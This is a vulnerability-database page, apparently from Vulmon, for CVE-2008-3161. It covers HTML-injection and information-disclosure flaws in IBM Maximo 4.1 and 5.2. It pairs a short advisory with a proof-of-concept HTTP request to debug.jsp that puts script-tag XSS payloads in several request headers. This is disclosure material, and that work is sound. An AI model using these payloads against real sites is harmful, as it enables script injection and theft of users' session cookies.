Recent Vulnerabilities Product List Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2008-3161

Publish Date: 11 Jul 2008

                source: http://www.securityfocus.com/bid/30180/info

IBM Maximo is prone to multiple HTML-injection vulnerabilities and an information-disclosure vulnerability.

An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. Code execution may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Information obtained may aid in further attacks.

These issues affect IBM Maximo 4.1 and 5.2; other versions may also be vulnerable. 

GET /jsp/common/system/debug.jsp HTTP/1.1
Accept: &lt;script&gt;alert('XSS');&lt;/script&gt;
Accept-Language: &lt;script&gt;alert('XSS');&lt;/script&gt;
UA-CPU: &lt;script&gt;alert('XSS');&lt;/script&gt;
Accept-Encoding: &lt;script&gt;alert('XSS');&lt;/script&gt;
User-Agent: &lt;script&gt;alert('XSS');&lt;/script&gt;
Host: maximo
Connection: Keep-Alive
Cookie: &lt;script&gt;alert('XSS');&lt;/script&gt;

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Product List Vendor List Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

IBM Maximo 4.1/5.2 - '/debug.jsp' HTML Injection / Information Disclosure

Vulmon Search

About

Products

Connect